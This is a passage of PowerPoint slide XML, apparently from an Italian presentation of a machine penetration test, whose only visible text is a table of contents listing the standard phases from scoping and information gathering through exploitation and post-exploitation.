      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="59" name="Google Shape;2686;p43">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{911EC704-3F17-828E-E68E-CD745D28D0A8}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="630720" y="154326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Google Shape;2685;p43">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{11B312B6-A920-5A54-5724-D7CF16D56138}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3476318" y="28033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“Scope” di cosa è stato analizzato</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="66" name="Google Shape;2686;p43">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{BC4F4BB3-1CB0-3FD5-5EC6-F319DCE226E0}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3386827" y="24288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Scoping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Google Shape;2686;p43">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F7B1D64F-9D4F-A16C-C85C-964D00932EA4}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3388130" y="15433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Google Shape;2685;p43">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D2A1E0E7-1AA4-186E-5AEF-8AEF4132AA0F}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6238940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Recupero delle informazioni</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="70" name="Google Shape;2686;p43">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{58708409-AA91-4FC6-7665-6A5061A16B4B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6149449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Information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Gathering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Google Shape;2686;p43">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A43A0249-E69B-B8D4-9A81-F8DEDFC6BCE4}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6150752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Google Shape;2685;p43">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{6219FA9C-AAF6-4C2A-6056-7244FA6A71BF}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8993743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della macchina </a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="82" name="Google Shape;2686;p43">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B501273F-AFF0-F8BF-F9A6-E80D23535575}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8904252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Discovery</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="83" name="Google Shape;2686;p43">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A8EF3834-B6F7-56F4-C86A-B487A5C68A08}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8905555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Google Shape;2685;p43">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{5322EF44-D519-CCB9-7D23-AB6F07BB05E8}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="719957" y="5284522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dei servizi esposti dalla macchina</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="101" name="Google Shape;2686;p43">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F4535016-F30C-8954-26C5-82F629890E3C}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="630466" y="490996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Enumerating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Target</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="102" name="Google Shape;2686;p43">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A49380DD-6FA6-B454-5070-7426BFA0D50C}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="631769" y="402451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3" name="Google Shape;2685;p43">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{8FBB894C-1FF8-7D81-16BB-969484823587}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3477367" y="52846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Analisi dei problemi di sicurezza della macchina</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="104" name="Google Shape;2686;p43">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{AEB2C201-EB3D-AD5D-B471-9A67BFBAA78D}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3387876" y="49100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Vulnerability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Mapping</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="105" name="Google Shape;2686;p43">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{4071A593-F62C-6F5D-6229-96CBDE5FC1C4}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3389179" y="40246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6" name="Google Shape;2685;p43">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{974F0F60-73FF-9152-0B82-3AE630A4C40F}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6239989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Sfruttamento delle vulnerabilità identificate</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="107" name="Google Shape;2686;p43">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{55A3F5AA-7955-2BD0-810C-4F774F96E6FC}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6150498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Exploitation</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="108" name="Google Shape;2686;p43">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E6D69C5A-300A-813F-52B4-58346641FCDE}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6151801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Google Shape;2685;p43">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{71B8FCE1-50DE-B51C-50D9-AEAF9E6F3827}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8994792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Privilege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Escalation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Mantaining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Access</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="110" name="Google Shape;2686;p43">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E3BAFCFD-E52D-C16E-E72C-CC4CAA299C7D}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8905301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Post Exploitation</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="111" name="Google Shape;2686;p43">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{FDC0D109-E6E8-8745-A06D-F862BDE306F1}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8906604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948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1A3260"/>
            </a:gs>
            <a:gs pos="100000">
              <a:srgbClr val="25468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tangolo 121">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{8C0A454C-8EBE-BFD1-BDE1-5AFF67ED2052}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8895339" y="3859506"/>
            <a:ext cx="2611973" cy="230096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2D574A72-4333-EDA4-E272-AF58B0A83CFB}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="614266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3064F1B-4547-A3B6-A9B2-E4A016EFB1D1}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6148797" y="1360665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9DAA0B11-ADC5-7C57-6D63-115CF6E911D6}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8895340" y="136095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2656F24F-3B3F-3B62-D95C-6128286003FC}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3402253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74219E84-0E88-40C4-C060-721FB1639B36}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3402254" y="134817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DD2DD3BF-1E82-13F6-8CC2-2E630E328286}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="630467" y="3859506"/>
            <a:ext cx="2611973" cy="2300961"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="4472C4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8EDEF159-E7E1-CED4-924E-33310161E37E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="629418" y="1348173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B9F3C-8AD4-65DA-DD79-DA0F801F92AD}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="53449" y="298112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TABLE OF CONTENT</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="53" name="Google Shape;2685;p43">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{BC90CC3D-05EE-6228-5A5A-6E9C219BAEAF}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="718908" y="2803267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Uno sguardo agli strumenti utilizzati nelle varie fasi</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="54" name="Google Shape;2686;p43">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B793AF34-6614-AEA2-96F9-B50AE3CFF52E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="629417" y="242871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Strumenti Utilizzati</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="59" name="Google Shape;2686;p43">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{911EC704-3F17-828E-E68E-CD745D28D0A8}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="630720" y="154326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Google Shape;2685;p43">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{11B312B6-A920-5A54-5724-D7CF16D56138}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3476318" y="28033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“Scope” di cosa è stato analizzato</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="66" name="Google Shape;2686;p43">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{BC4F4BB3-1CB0-3FD5-5EC6-F319DCE226E0}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3386827" y="24288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Scoping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Google Shape;2686;p43">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F7B1D64F-9D4F-A16C-C85C-964D00932EA4}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3388130" y="15433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Google Shape;2685;p43">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D2A1E0E7-1AA4-186E-5AEF-8AEF4132AA0F}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6238940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Recupero delle informazioni</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="70" name="Google Shape;2686;p43">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{58708409-AA91-4FC6-7665-6A5061A16B4B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6149449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Information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Gathering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Google Shape;2686;p43">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A43A0249-E69B-B8D4-9A81-F8DEDFC6BCE4}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6150752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Google Shape;2685;p43">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{6219FA9C-AAF6-4C2A-6056-7244FA6A71BF}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8993743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della macchina </a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="82" name="Google Shape;2686;p43">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B501273F-AFF0-F8BF-F9A6-E80D23535575}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8904252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Discovery</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="83" name="Google Shape;2686;p43">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A8EF3834-B6F7-56F4-C86A-B487A5C68A08}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8905555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Google Shape;2685;p43">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{5322EF44-D519-CCB9-7D23-AB6F07BB05E8}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="719957" y="5284522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dei servizi esposti dalla macchina</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="101" name="Google Shape;2686;p43">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F4535016-F30C-8954-26C5-82F629890E3C}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="630466" y="490996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Enumerating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Target</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="102" name="Google Shape;2686;p43">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A49380DD-6FA6-B454-5070-7426BFA0D50C}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="631769" y="402451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3" name="Google Shape;2685;p43">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{8FBB894C-1FF8-7D81-16BB-969484823587}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3477367" y="52846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Analisi dei problemi di sicurezza della macchina</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="104" name="Google Shape;2686;p43">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{AEB2C201-EB3D-AD5D-B471-9A67BFBAA78D}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3387876" y="49100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Vulnerability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Mapping</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="105" name="Google Shape;2686;p43">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{4071A593-F62C-6F5D-6229-96CBDE5FC1C4}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3389179" y="40246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6" name="Google Shape;2685;p43">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{974F0F60-73FF-9152-0B82-3AE630A4C40F}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6239989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Sfruttamento delle vulnerabilità identificate</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="107" name="Google Shape;2686;p43">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{55A3F5AA-7955-2BD0-810C-4F774F96E6FC}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6150498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Exploitation</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="108" name="Google Shape;2686;p43">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E6D69C5A-300A-813F-52B4-58346641FCDE}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
